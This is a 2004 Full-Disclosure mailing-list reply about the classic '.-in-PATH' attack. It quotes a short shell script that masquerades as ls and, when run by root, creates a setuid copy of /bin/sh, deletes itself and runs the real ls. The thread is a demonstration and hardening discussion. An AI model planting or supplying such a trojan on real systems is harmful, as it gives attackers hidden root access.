Re: [Full-Disclosure] Old LS Trojan?
From: Andrew Farmer (andfarm_at_teknovis.com)
To: "David S. Morgan" <email@example.com> Date: Wed, 1 Dec 2004 14:27:40 -0800
On 01 Dec 2004, at 12:11, David S. Morgan wrote:
> I am looking for an old LS trojan, with trojan being a misnomer.
> Essentially, the scinario is that the admin (root) has a . (dot) in
> his path. The bad-user knows this, and has crafted an LS shell script
> (the part that I can't find) that essentially copies /sbin/sh to a
> hidden directory and then performs some suid majik to make the sh run
> as if they were root, without needing the root password. The file
> then removes itself and does the real version of ls.
> Does anyone remember this one, and have the ls script anywhere? I
> would like to use it in a demonstration. I know that this has
> probobly been fixed in various ways, but I have "old Unixes" for just
> such occasions.
Probably something along the lines of:
> [ `whoami` = root ] || exit
> cp /bin/sh /bin/suid-sh
> chmod +s /bin/suid-sh
> rm $0
> exec /bin/ls $*
Note that this would only run if your $PATH _begins_ with '.' - if
you're going to put '.' in your $PATH, put it _last_.
Full-Disclosure - We believe in it.
- application/pgp-signature attachment: This is a digitally signed message part